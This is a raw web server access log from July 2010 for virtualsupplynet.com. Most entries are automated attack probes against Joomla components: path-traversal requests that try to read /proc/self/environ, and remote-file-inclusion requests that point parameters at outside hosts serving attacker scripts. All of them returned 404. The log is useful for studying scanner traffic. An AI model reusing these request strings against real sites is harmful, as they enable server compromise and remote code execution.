69.175.105.186 - - [13/Jul/2010:21:49:45 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
69.175.105.186 - - [13/Jul/2010:22:03:57 -0700] "GET /logs/access_100619.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
69.175.105.186 - - [13/Jul/2010:22:03:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
69.175.105.186 - - [13/Jul/2010:22:03:57 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
69.175.105.186 - - [13/Jul/2010:22:07:25 -0700] "GET /logs/access_100703.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "virtualsupplynet.com"
204.236.235.245 - - [13/Jul/2010:23:03:43 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.virtualsupplynet.com"
204.236.235.245 - - [13/Jul/2010:23:03:43 -0700] "GET /logs/access_100410.log HTTP/1.0" 200 75311 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.virtualsupplynet.com"
77.88.31.246 - - [13/Jul/2010:23:28:04 -0700] "GET /logs/access.log HTTP/1.1" 200 177203 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:31:32 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:31:32 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:31:32 -0700] "GET /logs/access_100703.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:31:32 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:31:32 -0700] "GET /logs/access_100703.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:31:32 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:31:39 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:31:39 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:31:39 -0700] "GET /logs/access_100703.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:31:41 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:31:41 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:31:41 -0700] "GET /logs/access_100703.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:31:41 -0700] "GET /logs/access_100703.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:31:41 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:31:41 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:31:54 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:31:54 -0700] "GET /logs/access_100703.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:31:54 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:39:00 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:39:00 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:39:00 -0700] "GET /logs/access_100619.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:39:14 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:39:14 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:39:14 -0700] "GET /logs/access_100619.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:39:14 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:39:14 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:39:14 -0700] "GET /logs/access_100619.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:39:16 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:39:16 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:39:16 -0700] "GET /logs/access_100619.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:39:28 -0700] "GET /logs/access_100703.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:39:28 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:39:28 -0700] "GET /logs/access_100619.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:39:28 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:39:44 -0700] "GET /logs/access_100703.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:39:45 -0700] "GET /logs/access_100703.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
86.58.254.133 - - [14/Jul/2010:01:39:47 -0700] "GET /logs/access_100703.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:39:59 -0700] "GET /logs/access_100703.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:40:19 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:40:19 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:40:19 -0700] "GET /logs/access_100619.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
184.107.41.155 - - [14/Jul/2010:01:40:49 -0700] "GET /logs/access_100703.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://buyurhmnow.com//includes/id/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "virtualsupplynet.com"
204.68.97.133 - - [14/Jul/2010:01:46:31 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1)" "virtualsupplynet.com"
208.80.193.39 - - [14/Jul/2010:02:15:50 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.6-standalone; rev1.6; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.virtualsupplynet.com"
213.171.37.206 - - [14/Jul/2010:03:40:58 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "virtualsupplynet.com"
213.171.37.206 - - [14/Jul/2010:03:40:58 -0700] "GET /logs/access_100703.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "virtualsupplynet.com"
213.171.37.206 - - [14/Jul/2010:03:40:58 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "virtualsupplynet.com"
77.88.31.246 - - [14/Jul/2010:03:48:15 -0700] "GET /logs/access_100220.log HTTP/1.1" 200 78076 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:04:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:04:17 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:05:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:05:14 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:07:03 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:07:10 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:08:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:09:01 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:10:26 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:10:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:10:26 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:11:46 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:11:47 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:11:47 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:22:43 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:22:44 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:22:44 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:22:50 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:22:57 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:22:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:22:58 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:23:21 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:23:22 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:23:22 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:23:43 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:23:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:23:43 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:23:47 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:24:31 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:24:34 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:27:48 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:27:49 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:27:49 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:28:22 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:28:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:28:23 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
67.215.11.226 - - [14/Jul/2010:05:41:39 -0700] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
67.215.11.226 - - [14/Jul/2010:05:41:39 -0700] "GET /logs/access_100515.log//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
67.215.11.226 - - [14/Jul/2010:05:41:39 -0700] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.dukhi.co.uk/includes/PEAR/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:43:44 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:43:49 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:43:50 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:43:55 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:58:23 -0700] "GET /logs/access_100703.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:58:24 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
188.72.70.56 - - [14/Jul/2010:05:58:24 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "virtualsupplynet.com"
